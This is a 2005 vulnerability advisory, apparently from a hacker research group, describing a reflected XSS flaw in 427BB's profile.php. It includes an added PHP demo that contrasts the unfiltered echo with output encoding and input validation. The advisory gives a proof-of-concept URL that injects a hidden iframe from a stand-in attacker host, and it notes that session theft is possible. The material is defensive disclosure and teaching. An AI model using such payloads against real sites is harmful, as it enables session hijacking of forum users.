427BB profile.php XSS vulnerability.

2005-03-01T00:00:00
ID SECURITYVULNS:DOC:7961
Type securityvulns
Reporter Securityvulns
Modified 2005-03-01T00:00:00

Description

[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]
[]
[] HRG - Hackerlounge Research Group [] Release: HRG007 [] Monday 03/01/05 [] 427BB
[]
[] The author can't be held responsible for any damage
[] done by a reader. You have your own responsibility.
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][] [][][]

Vulnerable: 427BB (Any Version)


General Information:

427BB is a simple board, and I have no idea why I'm releasing this because it's very unpopular, but I said what the hell. It's based on PHP and MySQL.


Description:

In profile.php the user parameter is vulnerable to XSS from a remote attacker. The user string is not filtered for < > or ", so it is echoed into the page as-is. Because the value arrives in a GET request, an attacker only needs a victim to follow a crafted link, which makes stealing a session (and much else) very easy.


PoC Code
Place the following in the URL, then load the profile page and the injected markup will be rendered and executed.

profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E

This is very unsafe because an attacker can execute any script they like in the context of the forum, which can lead to major damage to the forum being attacked.
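The pattern the description refers to, as an added example that is not 427BB's own source: a minimal stand-in for the unfiltered echo in profile.php beside a hardened version, run against the PoC payload above. Function names, the query handling and the username whitelist are assumptions for illustration; the payload is the advisory's.

```php
<?php
// Added example, not 427BB's own code. A minimal stand-in for the
// profile.php pattern described in the advisory, beside a hardened form.
// Function names, the query handling and the whitelist pattern are
// assumptions for illustration; the payload is the advisory's PoC.

// Vulnerable pattern: the user parameter goes straight into the HTML.
function render_profile_vulnerable(string $user): string
{
    return "<h1>Profile of " . $user . "</h1>\n";
}

// Hardened pattern: encode for the HTML text context at output time.
// ENT_QUOTES also encodes ' and ", so the same helper is safe inside quoted
// attribute values; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking output.
// Encoding at output is the fix; stripping < > " from input is not, because
// other contexts (unquoted attributes, JavaScript) need different escaping.
function render_profile_fixed(string $user): string
{
    $safe = htmlspecialchars($user, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h1>Profile of " . $safe . "</h1>\n";
}

// Additional first line of defence: board usernames normally match a narrow
// pattern, so anything else can be rejected before the database lookup.
// (The pattern is an assumption; adjust to the board's real rules.)
function is_valid_username(string $user): bool
{
    return preg_match('/^[A-Za-z0-9_-]{1,32}$/', $user) === 1;
}

// Decode the PoC query string the way PHP would populate $_GET.
$query = 'user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E';
parse_str($query, $params);
$user = $params['user'] ?? '';

echo "Vulnerable output:\n", render_profile_vulnerable($user);
echo "Hardened output:\n", render_profile_fixed($user);

// Check: the injected tag must not survive as markup in the hardened output.
$leaked = stripos(render_profile_fixed($user), '<iframe') !== false;
echo $leaked ? "FAIL: tag still present\n" : "OK: tag neutralised\n";

// The whitelist rejects the payload but accepts an ordinary handle.
var_dump(is_valid_username($user));        // bool(false)
var_dump(is_valid_username('th3_r4v3n'));  // bool(true)

// Encoding alone also defuses an attribute-breakout attempt such as "><script>.
echo render_profile_fixed('"><script>alert(1)</script>');
```

Run with `php profile_demo.php`. The vulnerable function emits the iframe verbatim; the hardened one emits `&lt;iframe ...&gt;`, which the browser displays as text. Validation and output encoding are complementary: validation narrows what reaches the database, encoding protects every place the value is later rendered.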


Fix and Vendor status:

Vendor has been notified, expect official patch soon.


Greetz:

All the people at hackerlounge.com, JWT, TGS-Security.com and JWT-Security.net. Specifically:

Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, Modzilla, Pingu, Jake Johnson, Afterburn, airo, cardiaC, chis, ComputerGeek, deep_phreeze, dudley, evasion, eXtacy, Mattewan, Afterburn, Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, Slarty, NoUse, Snake (I hate you), Surreal (I hate you), -=Vanguard=-, The_IRS, puNKiey, driedice, Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, voteforpedro, Cryptic_Override, kodaxx, ~CreEpy~NoDquE~, Brainscan, the_exode, phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and anyone else I forgot.


Credit:

HRG - Hackerlounge Research Group http://www.Hackerlounge.com

Partial credit is also given to lancastertechnologies.org, founded by JWT.
